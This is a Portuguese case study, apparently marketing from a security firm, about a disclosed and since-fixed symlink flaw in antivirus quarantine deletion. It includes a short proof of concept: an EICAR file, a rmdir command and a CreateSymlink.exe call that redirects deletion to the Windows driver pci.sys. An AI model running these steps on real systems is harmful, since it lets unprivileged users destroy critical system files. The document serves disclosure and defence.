Resumo do Caso
Durante uma auditoria de segurança realizada por FikreSekhel, foi identificada uma vulnerabilidade de escalação de privilégio local (LPE – Local Privilege Escalation) em um sistema de antivírus utilizado por um e-commerce. A falha ocorre no processo de exclusão de arquivos em quarentena, permitindo que um usuário sem privilégios administrativos exclua arquivos críticos do sistema através de um ataque de symlink (atalho simbólico).
Essa vulnerabilidade foi classificada como Média e resolvida após a implementação de verificações adicionais na exclusão de arquivos.
Linha do Tempo do Incidente
| Data | Horário (UTC) | Ação |
|---|---|---|
| 16/09/2020 | 11:27 | Vulnerabilidade reportada |
| 17/09/2020 | 15:10 | Status alterado para “Triaged” após validação da falha |
| 06/10/2020 | 09:20 | Recompensa concedida ao pesquisador |
| 10/02/2021 | 23:04 | Vulnerabilidade resolvida e status do relatório fechado |
| 26/08/2024 | 15:31 | Relatório tornado público |
Detalhes da Vulnerabilidade
O sistema de antivírus, ao mover um arquivo para quarentena, não o exclui completamente do local original. Em vez disso, esvazia seu conteúdo, oculta o arquivo e permite sua exclusão manual posteriormente. Esse processo é vulnerável a ataques de symlink, permitindo que um usuário de baixo privilégio engane o sistema para excluir qualquer arquivo crítico do sistema operacional.
Exemplo de Código Explorável
1. Criando um Arquivo Detectado como Malicioso
mkdir %userprofile%\Desktop\malicioso
echo|set /p="X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*" > %userprofile%\Desktop\malicioso\teste.exeEsse código cria um arquivo EICAR, que será detectado e colocado em quarentena pelo antivírus.
2. Criando o Ataque de Symlink
Após o arquivo ser movido para quarentena, deletamos seu diretório e criamos um symlink apontando para um arquivo crítico do sistema:
rmdir /S /Q %userprofile%\Desktop\malicioso
CreateSymlink.exe %userprofile%\Desktop\malicioso\teste.exe C:\Windows\System32\drivers\pci.sysAgora, o antivírus tentará excluir o arquivo pci.sys (driver do Windows), comprometendo o sistema.
3. Ativando a Exclusão de Arquivos da Quarentena
1. Abrir a interface do antivírus.
2. Acessar a seção de Quarentena.
3. Selecionar o arquivo e clicar em "Excluir do PC".O antivírus tentará excluir o arquivo original, mas como ele agora é um symlink para pci.sys, o arquivo crítico será removido.
🔴 Problema: O antivírus executa a exclusão sem verificar se o arquivo original foi alterado.
⚠️ Impacto: Usuários sem privilégios administrativos podem excluir arquivos críticos do sistema operacional.
🚀 Impacto da Vulnerabilidade
🔴 Escalação de Privilégio Local (LPE): Usuários comuns podem deletar arquivos protegidos pelo sistema operacional.
🔴 Comprometimento do Sistema: A remoção de arquivos críticos pode tornar o sistema inutilizável, causando falhas e telas azuis.
🔴 Potencial para Ataques Maiores: A técnica pode ser combinada com outros vetores para obtenção de privilégios administrativos.
Resolução e Medidas Preventivas
✅ Impedir a exclusão de arquivos via symlink
✅ Verificar a identidade do usuário antes de deletar arquivos protegidos
✅ Executar operações de exclusão com permissões do usuário e não do sistema
✅ Registrar logs detalhados para detectar tentativas de exploração
✅ Treinamento da equipe de segurança para reconhecer vetores de ataque semelhantes
Conclusão
Este caso reforça a necessidade de validações rigorosas em operações críticas, especialmente quando envolvem exclusão de arquivos do sistema. Implementar proteções contra ataques de symlink e validar permissões adequadamente são essenciais para evitar exploração de escalação de privilégio local (LPE).
🔎 Sua aplicação está protegida contra ataques de symlink? Testes regulares podem evitar comprometimento do sistema e ataques de escalonamento de privilégios.
💡 Entre em contato com nossos especialistas e agende uma auditoria de segurança!